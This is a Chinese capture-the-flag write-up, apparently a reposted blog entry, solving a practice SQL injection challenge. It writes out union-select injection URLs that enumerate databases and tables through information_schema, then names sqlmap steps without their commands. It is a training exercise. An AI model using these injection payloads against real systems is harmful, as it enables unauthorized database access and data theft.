21.这个看起来有点简单

时间：2017-08-04 11:04:02 阅读：126 评论：0 收藏：0 [点我收藏+]

这题就是个sqi注入的：

手工注入：

我先是简单尝试，就发现了，可以执行sql语句

http://ctf5.shiyanbar.com/8/index.php?id=2 group by 2 没报错

说明我们有两个字段可以提供给我们使用，比如说如下语句

http://ctf5.shiyanbar.com/8/index.php?id=2 union select 1,2

那么就简单了，直接查看所以数据库名

http://ctf5.shiyanbar.com/8/index.php?id=2 union select group_concat(schema_name,"~~"),2 from information_schema.schemata

得到三个数据库，我们猜测第2个数据库中（因为该页面的数据就在其中可以用database()查看）

查看里面所有的表

http://ctf5.shiyanbar.com/8/index.php?id=2 union select group_concat(table_name,"~~"),2 from information_schema.tables where table_schema =‘my_db‘

应该就是这个，查看字段名

OK现在可以直接看flag了

直接复制进去就可以提交了

SqlMap工具利用，这个就快当了：

探测是否有注入：

有注入漏洞：

爆破所有数据库：

发现三个数据库：

爆my_db库中的表：

发现两个表：

直接爆thiskey这个表中的字段：

得到Key(我用的是最新sqlmap)

原文地址：http://11856238.blog.51cto.com/11846238/1953431

踩

(0)

评论一句话评论（0）

分享档案

更多>

周排行